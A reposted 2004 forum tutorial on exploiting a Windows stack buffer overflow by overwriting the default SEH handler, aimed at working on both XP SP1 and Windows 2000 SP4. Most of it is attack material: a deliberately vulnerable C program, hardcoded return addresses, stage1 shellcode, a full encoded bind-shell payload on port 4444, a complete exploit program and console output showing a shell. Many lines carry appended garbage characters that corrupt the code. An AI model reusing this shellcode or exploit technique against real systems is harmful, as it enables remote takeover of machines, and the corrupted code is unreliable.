数学建模社区-数学中国

标题: Exploiting Default Exception Handler to Increase Exploit Sta [打印本页]
作者: 韩冰    时间: 2004-11-19 10:39
标题: Exploiting Default Exception Handler to Increase Exploit Sta
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.
, U0 R6 K) S4 N' W2 p" C
0 e# p9 D  `) {7 L% G  v8 T[Buf] <- Shellcode5 l, a" V7 l1 b% D% C% o, `# F, n
[Return Address] <- jmp register (for Windows XP sp1)
4 _. P9 n5 F0 W) N4 T* q[Various Stack Data] <- Junk
& B% \) `& b6 r' P! b[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
& w: K+ C' p* Y* x* l, C& V( @. A[SE Handler] <- jmp register (for Win2k sp4), M  V* ]8 ~/ _$ w; D8 g8 U4 G
[Stage1 Shellcode] <- stage1 shellcode for win2k
' K  c% [% ^: a- p6 t8 F3 V6 U
$ W5 \7 g6 x! q- a5 @2 A! cIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses- l  ?3 `5 `; a3 a

1 e# o4 b" u, A! E, k; NNecessary Tools:
. X7 g. G( S/ u! x! W2 `, x# \0 C- OllyDBG
. L2 P; e' Q3 i- C/C++ Compiler
9 c$ I8 t) y- r3 r3 ?0 Q4 L8 N2 X) R9 [- nasm. c6 P! A$ H4 T4 l! M
- Sac6 n! x1 J5 i2 ]+ w8 k- D
6 C7 Z% v( P1 w( [& [
Vulnerable Code:. Z" ]# d% o. q: A$ X8 k: n
//lamebuf.c5 l: R% U- t( Z& i7 I# A+ s& @: |
#include<stdio.h>
" s: Z$ I7 V1 T* C' N#include<string.h>
+ ]5 q, ^8 Y1 U/ C" p: w#include<windows.h>
4 e  u) g8 [5 Q3 n' }! E$ h' _8 Oint main(int argc,char *argv[]){6 h: ~8 T3 O; t! r+ C' z
! `  ?7 w, x; x- a4 h( Q/ x9 _. f! g
char buf[512];) X7 b& u4 e0 I. A8 Q
char buf1[1024]; // <- simulate a stack
9 f0 I" v+ r# E8 C8 X5 s//DebugBreak();
$ g# l; ?3 c, |3 `1 W5 v" X' Y7 vif (argc != 2){ return -1; }. R3 T' u" }1 z3 \4 ~( k
; a" y0 g  Z  t$ h6 @& e
strcpy(buf,argv[1]);* f* F8 M4 O+ K4 Y
return 0x0;+ e+ R. X, ?4 L2 C# F& S" K: a
}8 D. s( o, y) S8 [

+ n3 D" W" K4 C3 QGetting Started:
0 O6 f" ?2 y) w- a) MBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:
6 l" h# ^4 |' d/ S' Z. ~: V; P% z
0 o( h9 j$ A6 X9 B% oEAX 000000005 w* ~4 t: z  r. x, `, ?. Q
ECX 00321404" M! c9 {3 ?1 c
EDX 00414141
% ~: |( N& B/ F9 u- @EBX 7FFDF0002 H, L6 ?! U3 I3 d  v
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
" F$ k3 b3 |) r/ e6 T$ D9 REBP 41414141
! Y; B& P- i* F+ b# R7 v2 _: ?ESI 77D4595F: ]* N1 V& p$ p) h) R
EDI 77F59037 ntdll.77F59037
' k2 `$ H; R: r$ Q, j+ {1 R6 {( ~EIP 41414141
3 t6 I' K. @# q
6 o2 X% _4 H) t  f1 T8 ELets take a look at the stack and see what happened to the default exception handler:
4 n$ M; |$ R7 S, ?/ J: b# b: k1 V" K! d0x0012FFB0 41414141 Pointer to next SEH Record
' l; X. \+ |; c7 w) }- F- f0x0012FFB4 41414141 SE Handler. `1 R/ z0 c, j5 q
4 R: q8 T+ ?' ]
We successfully overwrote the return address and the default exception handler.' q1 @) s- T- {' w$ d) ]# x% @6 q
* z4 w' ^) u0 }4 A: N4 a
Primary Return Address (Windows XP SP1 EN):
: e+ T+ E( F7 n% K- k8 zThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:/ h1 j# ?9 U5 k6 i
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"  e) Z0 d0 e9 ~  x. c0 w- J8 X
/ N( h' j+ o4 w
Secondary Return Address (Windows 2000 SP4 EN):& u3 P3 \; Y8 l! b
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
. P9 E9 B2 s( A& U"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
/ r# t0 v# |- S1 {* }, r' |5 A8 P2 `# H% {" L' U
Proof Of Concept:
6 l$ b7 Z! O0 H6 G// exploit.c. x2 ~: l  t1 V' H
// Tal zeltzer - [Double Return] //
! \+ [( U8 w7 p& y* p
1 B! F( z8 ^1 W0 K, V2 U" d#include<stdio.h>( p! z/ v- z" ^4 X% w1 {
#include<string.h>
7 x7 _  \6 L* r$ x4 j2 p/ l#include<windows.h>
% q  e  T! f- }; b% L- q* A: N5 t
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp0 a; O" X" K' x. {
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx+ d* H7 G; W# W5 o  o+ ~2 R

5 f! m- G8 T$ a3 i( R// Stage1 For WinXP Sp1 English: M( B. E( W5 |& V* M
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
- y  o3 Y% {* A+ Z
5 }0 Y* e( W4 \# C* Q/ P// Stage1 For Win2k Sp4 English9 ?+ n" q3 \# U' {
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
. Y1 u4 F# [  H7 _: f
) L0 {: M9 I1 n0 r// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
5 V' X0 `8 l/ funsigned char shellcode[] =) b% Z) L6 j. L: L# ^
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"% M: x' [5 X3 w6 G, Z
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
* W6 R3 i+ K( t9 A% B"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"' @! p) R4 k+ k* j% Q9 l- P
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"8 J9 B1 S2 {8 Z3 l
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"# d# |# C. Z4 q# L' {+ ^$ v
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
1 n3 X0 J) M( g3 ?8 Z"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
- D- V9 T* {  ^" R) M, d' E7 L& D"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
3 t* o  p: F) L8 ?2 y"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
; b' o( f" O8 @$ h/ n0 k: L"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf". m: j9 s5 j' @1 |2 A. |! M
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"4 `6 T8 P* ?: |3 y
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"% F2 A( v$ [! D3 O- r. t' S7 J
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"- A6 n/ T4 o* M" E
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
% B" g4 \6 ]3 g4 r"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
+ O( w: }. K( F  a  G2 o; W"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"4 T; p- U$ r* O5 K6 n- k# L  H
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
, z7 I2 d5 f& y* P2 V8 k% ~"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"( }8 ]5 A, _4 g) Q2 ]+ j
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"7 }8 |# U, a* @$ d$ f( z3 T
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
; d* P5 i$ _0 M( j"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f". e3 }' h) r# a& j9 t5 _
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
/ R( N8 z$ D) A: ["\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"( m2 l0 w1 ~" N: \' _* h
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
7 a% ]( I; A0 d3 t2 E, E"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";% `" H- V$ Y" J" q# J  q8 s# c9 N2 y
  z! K3 h8 k& l( D) N* c
: @2 _- `, g) j: r$ k% y7 e6 `
int main(int argc,char *argv[]){: v7 K/ O: C- Q) w% W) \$ o8 B

) s& \/ |- v6 [6 Qchar *bufExe[3];! x& E" s& K  o  a8 L3 g+ [6 g, e
char buf[2048];
* z; G! \- O1 J# {! JbufExe[0] = "lamebuf.exe";
6 |3 b0 k  b8 K! |$ B5 o3 s; ^bufExe[2] = NULL;+ O& ]; F- g0 R" E3 e8 U) M
% }: t2 P1 a7 g
memset(buf,0x0,sizeof(buf));
  m& _: J/ j6 k1 Smemset(buf,0x90,1652);
$ d4 ]: o# k- j& `! i) G( W) imemcpy(&buf[24],shellcode,sizeof(shellcode)-1);  h& p6 N  S% y# S& K4 j
7 i  m, t; a% y! d/ {, y
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode* {" e& ~5 l" Y+ m8 A
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode
9 E0 D  `9 r) v: k( q
( L4 {) d# n* T4 R% @0 ?*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
- G" y( r2 F. b" l/ B' O- E+ l* B*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code; u- U7 o9 M& \& v3 {5 ^: q
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en$ s6 ?8 T* v% |& ~
/ K# e  k8 @/ a  E: [) ~
- z4 x" @7 S9 J$ ~: k% ?3 E; y
bufExe[1] = buf;
7 ~. V, ~( q+ R$ g//Execute the vulnerable application, B3 n* A8 {* \/ w) ]9 D8 Q; y( V
execve(bufExe[0],bufExe,NULL);! ^: ?4 c. u5 l- e9 A
. {4 T) T6 F# ^2 m
return 0x0;
1 X, T, \) p* L9 c* |9 q5 l/ X' F}
: g! e; I/ A! A' r  L
) \9 p$ O3 M. ?$ [1 w* I- T9 NExploit under Windows XP SP1:% Z  G, @2 K$ T+ K* n
C:\>exploit
0 L0 M" W7 l1 K  yC:\>2 F+ u* N4 c6 Z& |/ g+ Q; s
C:\>telnet 127.0.0.1 4444( A" g2 w4 N" o: \
- P* ?8 |! b& q; b0 A  s
Microsoft Windows XP [Version 5.1.2600]5 q- X& K5 y! G# v  y) t
(C) Copyright 1985-2001 Microsoft Corp.
+ k, G/ F! C# m% Z1 h2 \- D
% r& j& ?) d* y  I. t1 Q' ~C:\>
+ k' B) q/ v1 K. x7 [! ~2 g" `7 b0 J/ h4 v
Exploit under Windows 2000 SP4:
1 r5 q9 r3 P0 \. R' ~0 V: y9 `C:\>exploit% Y# r. e# @3 ]7 @5 w, f
C:\>& b" j7 g( ~  B' d0 E0 q
C:\>telnet 127.0.0.1 4444
/ }; q  Z7 o' N0 W
. o& Z5 ?3 n2 g/ m8 ^( iMicrosoft Windows 2000 [Version 5.00.2195]
: |! G! J7 `/ Q/ C(C) Copyright 1985-2000 Microsoft Corp.



欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5